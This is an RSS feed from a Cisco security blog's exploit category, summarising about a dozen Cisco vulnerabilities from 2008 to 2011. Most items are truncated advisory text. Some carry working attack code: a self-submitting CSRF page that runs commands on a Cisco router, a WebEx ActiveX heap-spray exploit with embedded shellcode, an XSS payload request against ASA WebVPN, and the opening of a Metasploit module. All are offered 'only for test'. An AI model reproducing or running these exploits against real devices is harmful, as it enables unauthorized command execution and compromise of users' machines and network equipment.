<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>CiscoZine &#187; Exploit</title>
	<atom:link href="http://www.ciscozine.com/category/exploit/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.ciscozine.com</link>
	<description>Daily reporting on Cisco technology</description>
	<lastBuildDate>Wed, 08 Feb 2012 09:24:44 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Cisco TelePresence exploits</title>
		<link>http://www.ciscozine.com/2011/10/24/cisco-telepresence-exploits/</link>
		<comments>http://www.ciscozine.com/2011/10/24/cisco-telepresence-exploits/#comments</comments>
		<pubDate>Mon, 24 Oct 2011 06:55:58 +0000</pubDate>
		<dc:creator>Fabio Semperboni</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[DOS]]></category>
		<category><![CDATA[Remote Control]]></category>
		<category><![CDATA[TelePresence]]></category>

		<guid isPermaLink="false">http://www.ciscozine.com/?p=909</guid>
		<description><![CDATA[Cisco TelePresence is an umbrella term for Video Conferencing Hardware and Software, Infrastructure and Endpoints. The C &#38; MXP Series are the Endpoints used on desks or in boardrooms to provide users with a termination point for Video Conferencing. 1. Post-authentication HTML Injection &#8211; CVE-2011-2544 (CSCtq46488): Cisco TelePresence Endpoints have a web interface (HTTP or HTTPS) for managing, configuring and reporting. It is possible to set the Call ID (with H.323 or SIP) to a HTML value. If a call is made to another endpoint and an authenticated user browses to the web interface on the endpoint receiving the call [...]]]></description>
		<wfw:commentRss>http://www.ciscozine.com/2011/10/24/cisco-telepresence-exploits/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute exploit</title>
		<link>http://www.ciscozine.com/2011/07/07/cisco-anyconnect-vpn-client-activex-url-property-download-and-execute-exploit/</link>
		<comments>http://www.ciscozine.com/2011/07/07/cisco-anyconnect-vpn-client-activex-url-property-download-and-execute-exploit/#comments</comments>
		<pubDate>Thu, 07 Jul 2011 13:36:01 +0000</pubDate>
		<dc:creator>Fabio Semperboni</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[AnyConnect VPN Client]]></category>
		<category><![CDATA[Privilege escalation]]></category>
		<category><![CDATA[Remote Control]]></category>

		<guid isPermaLink="false">http://www.ciscozine.com/?p=890</guid>
		<description><![CDATA[The Cisco AnyConnect Secure Mobility Client, previously known as the Cisco AnyConnect VPN Client, is affected by the following vulnerabilities: Arbitrary Program Execution Vulnerability Local Privilege Escalation Vulnerability Cisco has released free software updates that address these vulnerabilities. There are no workarounds for this vulnerabilities. Below the source of the exploit (Only for test!). ## # $Id: cisco_anyconnect_exec.rb 12872 2011-06-06 20:15:51Z bannedit $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of [...]]]></description>
		<wfw:commentRss>http://www.ciscozine.com/2011/07/07/cisco-anyconnect-vpn-client-activex-url-property-download-and-execute-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cisco Unified Operations Manager exploits</title>
		<link>http://www.ciscozine.com/2011/07/06/cisco-unified-operations-manager-exploits/</link>
		<comments>http://www.ciscozine.com/2011/07/06/cisco-unified-operations-manager-exploits/#comments</comments>
		<pubDate>Wed, 06 Jul 2011 09:23:44 +0000</pubDate>
		<dc:creator>Fabio Semperboni</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Directory traversal vulnerability]]></category>
		<category><![CDATA[Remote Control]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[XSS vulnerabilities]]></category>

		<guid isPermaLink="false">http://www.ciscozine.com/?p=889</guid>
		<description><![CDATA[Cisco Unified Operations Manager (CuOM) is a NMS for voice developed by Cisco Systems. Operations Manager monitors and evaluates the current status of both the IP communications infrastructure and the underlying transport infrastructure in your network. Multiple vulnerabilities have been identified in Cisco Unified Operations Manager and associated products. These vulnerabilities include: multiple blind SQL injections multiple XSS directory traversal vulnerability Below the source of the exploit (Only for test!). Blind SQL injection vulnerabilities that affect CuOM (CVE-2011-0960): The Variable CCMs of PRTestCreation can trigger a blind SQL injection vulnerability by supplying a single quote, followed by a time delay [...]]]></description>
		<wfw:commentRss>http://www.ciscozine.com/2011/07/06/cisco-unified-operations-manager-exploits/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cisco Security Agent Management Console ‘st_upload’ RCE Exploit</title>
		<link>http://www.ciscozine.com/2011/07/05/cisco-security-agent-management-console-%e2%80%98st_upload%e2%80%99-rce-exploit/</link>
		<comments>http://www.ciscozine.com/2011/07/05/cisco-security-agent-management-console-%e2%80%98st_upload%e2%80%99-rce-exploit/#comments</comments>
		<pubDate>Tue, 05 Jul 2011 09:21:28 +0000</pubDate>
		<dc:creator>Fabio Semperboni</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Cisco Security Agent]]></category>
		<category><![CDATA[Code execution]]></category>
		<category><![CDATA[Remote Control]]></category>

		<guid isPermaLink="false">http://www.ciscozine.com/?p=888</guid>
		<description><![CDATA[Cisco Security Agent provides threat protection for server and desktop computing systems. Cisco Security Agent can function in a standalone manner or can be managed by the Management Center for Cisco Security Agent. The Management Center for Cisco Security Agent is affected by a vulnerability that could allow an unauthenticated attacker to perform remote code execution on the affected device. A successful exploit could allow the attacker to modify agent policies and system configuration and perform other administrative tasks. Note: This vulnerability can be exploited only by sending certain packets to the web management interface, which by default listens on [...]]]></description>
		<wfw:commentRss>http://www.ciscozine.com/2011/07/05/cisco-security-agent-management-console-%e2%80%98st_upload%e2%80%99-rce-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cisco Packet Tracer 5.2 DLL Hijacking Exploit</title>
		<link>http://www.ciscozine.com/2010/10/04/cisco-packet-tracer-5-2-dll-hijacking-exploit/</link>
		<comments>http://www.ciscozine.com/2010/10/04/cisco-packet-tracer-5-2-dll-hijacking-exploit/#comments</comments>
		<pubDate>Mon, 04 Oct 2010 16:06:47 +0000</pubDate>
		<dc:creator>Fabio Semperboni</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Packet Tracer]]></category>
		<category><![CDATA[Remote Control]]></category>

		<guid isPermaLink="false">http://www.ciscozine.com/?p=817</guid>
		<description><![CDATA[Untrusted search path vulnerability in Cisco Packet Tracer 5.2 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wintab32.dll that is located in the same folder as a .pkt or .pkz file. The vulnerability is caused due to the application loading libraries (e.g. wintab32.dll) in an insecure manner. The program uses a fixed path to look for specific files or libraries. This path includes directories that may not be trusted or under user control. By placing a custom version of the file or library in the path, the program [...]]]></description>
		<wfw:commentRss>http://www.ciscozine.com/2010/10/04/cisco-packet-tracer-5-2-dll-hijacking-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cisco ASA WebVPN Cross Site Scripting Vulnerability</title>
		<link>http://www.ciscozine.com/2009/04/26/cisco-asa-webvpn-cross-site-scripting-vulnerability/</link>
		<comments>http://www.ciscozine.com/2009/04/26/cisco-asa-webvpn-cross-site-scripting-vulnerability/#comments</comments>
		<pubDate>Sun, 26 Apr 2009 13:30:15 +0000</pubDate>
		<dc:creator>Fabio Semperboni</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[Remote Control]]></category>

		<guid isPermaLink="false">http://www.ciscozine.com/?p=707</guid>
		<description><![CDATA[Cisco ASA is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. Cisco ASA software versions 8.0.4(2B) and prior running on ASA 5500 Series Adaptive Security Appliances are vulnerable.   Test vulnerability: An attacker can exploit this issue by enticing an unsuspecting victim to follow a malicious HTTP request.   POST /+webvpn+/index.html HTTP/1.1 Host: "'&#62;&#60;script&#62;alert('BugsNotHugs')&#60;/script&#62;&#60;meta httpequiv="" content='"www.example.org Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://www.example.com/+webvpn+/index.html Accept-Language: en-us Content-Type: [...]]]></description>
		<wfw:commentRss>http://www.ciscozine.com/2009/04/26/cisco-asa-webvpn-cross-site-scripting-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Multiple Vulnerabilities in Cisco ASA / PIX security</title>
		<link>http://www.ciscozine.com/2009/04/13/multiple-vulnerabilities-in-cisco-asa-pix-security/</link>
		<comments>http://www.ciscozine.com/2009/04/13/multiple-vulnerabilities-in-cisco-asa-pix-security/#comments</comments>
		<pubDate>Mon, 13 Apr 2009 21:32:14 +0000</pubDate>
		<dc:creator>Fabio Semperboni</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[DOS]]></category>
		<category><![CDATA[Remote Control]]></category>

		<guid isPermaLink="false">http://www.ciscozine.com/?p=704</guid>
		<description><![CDATA[Multiple vulnerabilities exist in the Cisco ASA 5500 Series Adaptive Security Appliances and Cisco PIX Security Appliances. Vulnerable Products The following is a list of the products affected by each vulnerability as described in detail within this advisory. VPN Authentication Bypass Vulnerability Cisco ASA or Cisco PIX security appliances that are configured for IPsec or SSL-based remote access VPN and have the Override Account Disabled feature enabled are affected by this vulnerability. Note:  The Override Account Disabled feature was introduced in Cisco ASA software version 7.1(1). Cisco ASA and PIX software versions 7.1, 7.2, 8.0, and 8.1 are affected by [...]]]></description>
		<wfw:commentRss>http://www.ciscozine.com/2009/04/13/multiple-vulnerabilities-in-cisco-asa-pix-security/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cisco IOS Cross-Site Scripting Vulnerabilities</title>
		<link>http://www.ciscozine.com/2009/02/07/cisco-ios-cross-site-scripting-vulnerabilities/</link>
		<comments>http://www.ciscozine.com/2009/02/07/cisco-ios-cross-site-scripting-vulnerabilities/#comments</comments>
		<pubDate>Fri, 06 Feb 2009 23:41:58 +0000</pubDate>
		<dc:creator>Fabio Semperboni</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[CSRF]]></category>

		<guid isPermaLink="false">http://www.ciscozine.com/?p=674</guid>
		<description><![CDATA[Zloss has reported some vulnerabilities in Cisco IOS, which can be exploited by malicious people to conduct cross-site scripting and cross-site request forgery attacks. Input passed via the URL when executing commands is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user&#8217;s browser session in context of an affected site. The device allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to potentially alter the configuration of the device by tricking the user [...]]]></description>
		<wfw:commentRss>http://www.ciscozine.com/2009/02/07/cisco-ios-cross-site-scripting-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to test Cisco IOS FTP Server Multiple Vulnerabilities</title>
		<link>http://www.ciscozine.com/2009/01/21/how-to-test-cisco-ios-ftp-server-multiple-vulnerabilities/</link>
		<comments>http://www.ciscozine.com/2009/01/21/how-to-test-cisco-ios-ftp-server-multiple-vulnerabilities/#comments</comments>
		<pubDate>Wed, 21 Jan 2009 09:38:42 +0000</pubDate>
		<dc:creator>Fabio Semperboni</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[DOS]]></category>
		<category><![CDATA[Remote Control]]></category>

		<guid isPermaLink="false">http://www.ciscozine.com/?p=665</guid>
		<description><![CDATA[On 09 May 2007, Cisco published a Security advisory about multiple IOS FTP Server vulnetabilities. Cisco IOS FTP Server is prone to multiple vulnerabilities including a denial-of-service issue and an authentication-bypass issue. Attackers can exploit these issues to deny service to legitimate users, gain unauthorized access to an affected device, or execute arbitrary code. Only IOS devices that have the FTP Server feature enabled are vulnerable; this feature is disabled by default. The vulnerable produtcs are IOS versions 11.3, 12.0, 12.1, 12.2, 12.3 and 12.4 contain the IOS FTP server feature. If somebody would test this vulnerability (ONLY TEST&#8230;), I have find [...]]]></description>
		<wfw:commentRss>http://www.ciscozine.com/2009/01/21/how-to-test-cisco-ios-ftp-server-multiple-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to test Cisco Cross-Site Request Forgery</title>
		<link>http://www.ciscozine.com/2008/09/18/how-to-test-cisco-cross-site-request-forgery/</link>
		<comments>http://www.ciscozine.com/2008/09/18/how-to-test-cisco-cross-site-request-forgery/#comments</comments>
		<pubDate>Wed, 17 Sep 2008 22:34:01 +0000</pubDate>
		<dc:creator>Fabio Semperboni</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[CSRF]]></category>

		<guid isPermaLink="false">http://www.ciscozine.com/?p=245</guid>
		<description><![CDATA[Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit. Replace &#8220;10.10.10.1&#8243; with the IP address of the target router, embed this in a web page and hope for the best. This is only for test use. &#60;html&#62; &#60;body&#62; &#60;body onload="asdf.submit();"&#62; &#60;form name=asdf method="post" action="http://10.10.10.1/level/15/exec/-"&#62; &#60;input type=hidden name=command value="show privilege"&#62; &#60;input type=hidden name=command_url value="/level/15/exec/-"&#62; &#60;/body&#62; &#60;/html&#62; # milw0rm.com [2008-09-17]]]></description>
		<wfw:commentRss>http://www.ciscozine.com/2008/09/18/how-to-test-cisco-cross-site-request-forgery/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to test Cisco WebEx Meeting Manager vulnerability</title>
		<link>http://www.ciscozine.com/2008/09/03/how-to-test-cisco-webex-meeting-manager-vulnerability/</link>
		<comments>http://www.ciscozine.com/2008/09/03/how-to-test-cisco-webex-meeting-manager-vulnerability/#comments</comments>
		<pubDate>Wed, 03 Sep 2008 19:40:02 +0000</pubDate>
		<dc:creator>Fabio Semperboni</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[WebEx]]></category>

		<guid isPermaLink="false">http://www.ciscozine.com/?p=15</guid>
		<description><![CDATA[Searching more info about Cisco WebEx Meeting Manager vulnerability, I have found this exploit. Only for test.  &#60;html&#62; &#60;body&#62; &#60;object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target /&#62; &#60;/object&#62; &#60;script language=javascript&#62; // k`sOSe 08/08/2008 // tested in IE6, XP SP1 var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909"); while (block.length &#60; 0x25000) block += block; var memory = new Array(); var i=0; for (;i&#60;1000;i++) memory[i] += block + shellcode; memory[i] += shellcode; var buf2; for (var i=0; i&#60;151; i++) buf2 += "X"; buf2 += unescape("%09%09%09%09"); target.NewObject(buf2); &#60;/script&#62; &#60;/body&#62; &#60;/html&#62; # milw0rm.com [2008-08-10]]]></description>
		<wfw:commentRss>http://www.ciscozine.com/2008/09/03/how-to-test-cisco-webex-meeting-manager-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

